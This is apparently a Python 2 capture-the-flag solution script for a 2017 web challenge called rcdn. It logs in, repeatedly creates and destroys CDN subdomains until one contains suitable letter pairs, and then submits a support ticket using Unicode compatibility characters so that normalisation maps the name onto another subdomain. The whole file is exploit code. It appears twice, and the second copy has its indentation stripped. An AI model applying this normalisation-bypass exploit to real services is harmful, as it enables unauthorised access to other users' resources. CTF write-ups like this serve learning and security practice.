rkmylo/rcdn_solution.py

## rcdn_solution.py
# coding: utf-8

"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""

import re
import sys
import string
import requests
import itertools


target = 'http://rcdn.2017.teamrois.cn/'

username = 'XXXXXXXXXX'
password = 'XXXXXXXXXX'

url_login = target + 'signin'
url_dashboard = target + 'dashboard'
url_create_domain = target + 'dashboard/basic/new'
url_destroy_domain = target + 'dashboard/basic/destroy/{}'
url_tickets = target + 'support/ticket'
url_create_ticket = target + 'support/ticket/new'

proxies = {'http':'127.0.0.1:8080'}


def get_csrfmiddlewaretoken(url):
    resp = sess.get(url)
    csrfmiddlewaretoken = re.search('value=\'([a-zA-Z0-9]{64})\'', resp.content)
    csrfmiddlewaretoken = csrfmiddlewaretoken.group(1)
    return csrfmiddlewaretoken


def login():
    print '[*] logging in...'
    csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_login)
    data = {
        'csrfmiddlewaretoken': csrfmiddlewaretoken,
        'username': username,
        'password': password
    }
    resp = sess.post(url_login, data=data, proxies=proxies)
    return 'Sign out' in resp.content


def create_domain():
    print '[*] creating subdomain'
    resp = sess.get(url_create_domain, proxies=proxies)
    messages = sess.cookies['messages']
    fail_msg = 'You have exceeded maximum number of Basic CDN service'
    if fail_msg in messages: return False
    subdomain = re.search('\\\\([a-zA-Z0-9]{8})\\\\', messages)
    subdomain = subdomain.group(1)
    return subdomain


def destroy_domain(subdomain):
    print '[*] destroying subdomain: ' + subdomain
    resp = sess.get(url_destroy_domain.format(subdomain), proxies=proxies)
    return sess.cookies['messages']


def create_ticket(subdomain):
    print '[*] creating ticket for subdomain: ' + subdomain
    csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_create_ticket)
    data = {
        'csrfmiddlewaretoken': csrfmiddlewaretoken,
        'subject': subdomain,
        'subdomain': subdomain,
        'message': subdomain,
    }
    resp = sess.post(url_create_ticket, data=data, proxies=proxies)
    fail_msg = 'Only email support is available for Basic CDN Service.'
    if resp.status_code == 200 and fail_msg in resp.content:
        return fail_msg

    return sess.cookies['messages']


global sess
sess = requests.session()

login = login()
if not login:
    print '[-] failed to login'
    sys.exit(0)

"""
required = [ 'hv', 'mv', 'sd', 'ss', 'ppv', 'wc', 'mc', 'md', 'dj', 'cd', 'wz', 'hg', 'erg', 'ev', 'ltd', 'hpa', 'da', 'au', 'bar', 'ov', 'pc', 'dm', 'dm2', 'dm3', 'iu', 'pa', 'na', 'ma', 'ka', 'kb', 'mb', 'gb', 'cal', 'kcal', 'pf', 'nf', 'mg', 'kg', 'hz', 'khz', 'mhz', 'ghz', 'thz', 'ml', 'dl', 'kl', 'fm', 'nm', 'mm', 'cm', 'km', 'mm2', 'cm2', 'm2', 'km2', 'mm3', 'cm3', 'm3', 'km3', 'pa', 'kpa', 'mpa', 'gpa', 'rad', 'ps', 'ns', 'ms', 'pv', 'nv', 'mv', 'kv', 'mv', 'pw', 'nw', 'mw', 'kw', 'mw', 'bq', 'cc', 'cd', 'db', 'gy', 'ha', 'hp', 'in', 'kk', 'km', 'kt', 'lm', 'ln', 'log', 'lx', 'mb', 'mil', 'mol', 'ph', 'ppm', 'pr', 'sr', 'sv', 'wb', 'gal', 'ff', 'fi', 'fl', 'ffi', 'ffl', 'st', 'st', 'no', 'sm', 'tel', 'tm', 'fax' ]

while True:
    subdomain = create_domain()
    matches = [x for x in required if x in subdomain]
    if len(matches) >= 2:
        print '[+] Subdomain: ' + subdomain
        break
    else:
        destroy_domain(subdomain)

# Found domain: 'ghzlnmdg'
"""

t = '\xe3\x8e\x93'.decode('utf-8') + 'l' + '\xe3\x8e\x9a'.decode('utf-8') + 'dg'
print '[*] ' + create_ticket(t)
	# coding: utf-8

	"""
	Unfortunately solved 20 minutes after the end of the CTF :(
	"""

	import re
	import sys
	import string
	import requests
	import itertools


	target = 'http://rcdn.2017.teamrois.cn/'

	username = 'XXXXXXXXXX'
	password = 'XXXXXXXXXX'

	url_login = target + 'signin'
	url_dashboard = target + 'dashboard'
	url_create_domain = target + 'dashboard/basic/new'
	url_destroy_domain = target + 'dashboard/basic/destroy/{}'
	url_tickets = target + 'support/ticket'
	url_create_ticket = target + 'support/ticket/new'

	proxies = {'http':'127.0.0.1:8080'}


	def get_csrfmiddlewaretoken(url):
	resp = sess.get(url)
	csrfmiddlewaretoken = re.search('value=\'([a-zA-Z0-9]{64})\'', resp.content)
	csrfmiddlewaretoken = csrfmiddlewaretoken.group(1)
	return csrfmiddlewaretoken


	def login():
	print '[*] logging in...'
	csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_login)
	data = {
	'csrfmiddlewaretoken': csrfmiddlewaretoken,
	'username': username,
	'password': password
	}
	resp = sess.post(url_login, data=data, proxies=proxies)
	return 'Sign out' in resp.content


	def create_domain():
	print '[*] creating subdomain'
	resp = sess.get(url_create_domain, proxies=proxies)
	messages = sess.cookies['messages']
	fail_msg = 'You have exceeded maximum number of Basic CDN service'
	if fail_msg in messages: return False
	subdomain = re.search('\\\\([a-zA-Z0-9]{8})\\\\', messages)
	subdomain = subdomain.group(1)
	return subdomain


	def destroy_domain(subdomain):
	print '[*] destroying subdomain: ' + subdomain
	resp = sess.get(url_destroy_domain.format(subdomain), proxies=proxies)
	return sess.cookies['messages']


	def create_ticket(subdomain):
	print '[*] creating ticket for subdomain: ' + subdomain
	csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_create_ticket)
	data = {
	'csrfmiddlewaretoken': csrfmiddlewaretoken,
	'subject': subdomain,
	'subdomain': subdomain,
	'message': subdomain,
	}
	resp = sess.post(url_create_ticket, data=data, proxies=proxies)
	fail_msg = 'Only email support is available for Basic CDN Service.'
	if resp.status_code == 200 and fail_msg in resp.content:
	return fail_msg

	return sess.cookies['messages']


	global sess
	sess = requests.session()

	login = login()
	if not login:
	print '[-] failed to login'
	sys.exit(0)

	"""
	required = [ 'hv', 'mv', 'sd', 'ss', 'ppv', 'wc', 'mc', 'md', 'dj', 'cd', 'wz', 'hg', 'erg', 'ev', 'ltd', 'hpa', 'da', 'au', 'bar', 'ov', 'pc', 'dm', 'dm2', 'dm3', 'iu', 'pa', 'na', 'ma', 'ka', 'kb', 'mb', 'gb', 'cal', 'kcal', 'pf', 'nf', 'mg', 'kg', 'hz', 'khz', 'mhz', 'ghz', 'thz', 'ml', 'dl', 'kl', 'fm', 'nm', 'mm', 'cm', 'km', 'mm2', 'cm2', 'm2', 'km2', 'mm3', 'cm3', 'm3', 'km3', 'pa', 'kpa', 'mpa', 'gpa', 'rad', 'ps', 'ns', 'ms', 'pv', 'nv', 'mv', 'kv', 'mv', 'pw', 'nw', 'mw', 'kw', 'mw', 'bq', 'cc', 'cd', 'db', 'gy', 'ha', 'hp', 'in', 'kk', 'km', 'kt', 'lm', 'ln', 'log', 'lx', 'mb', 'mil', 'mol', 'ph', 'ppm', 'pr', 'sr', 'sv', 'wb', 'gal', 'ff', 'fi', 'fl', 'ffi', 'ffl', 'st', 'st', 'no', 'sm', 'tel', 'tm', 'fax' ]

	while True:
	subdomain = create_domain()
	matches = [x for x in required if x in subdomain]
	if len(matches) >= 2:
	print '[+] Subdomain: ' + subdomain
	break
	else:
	destroy_domain(subdomain)

	# Found domain: 'ghzlnmdg'
	"""

	t = '\xe3\x8e\x93'.decode('utf-8') + 'l' + '\xe3\x8e\x9a'.decode('utf-8') + 'dg'
	print '[*] ' + create_ticket(t)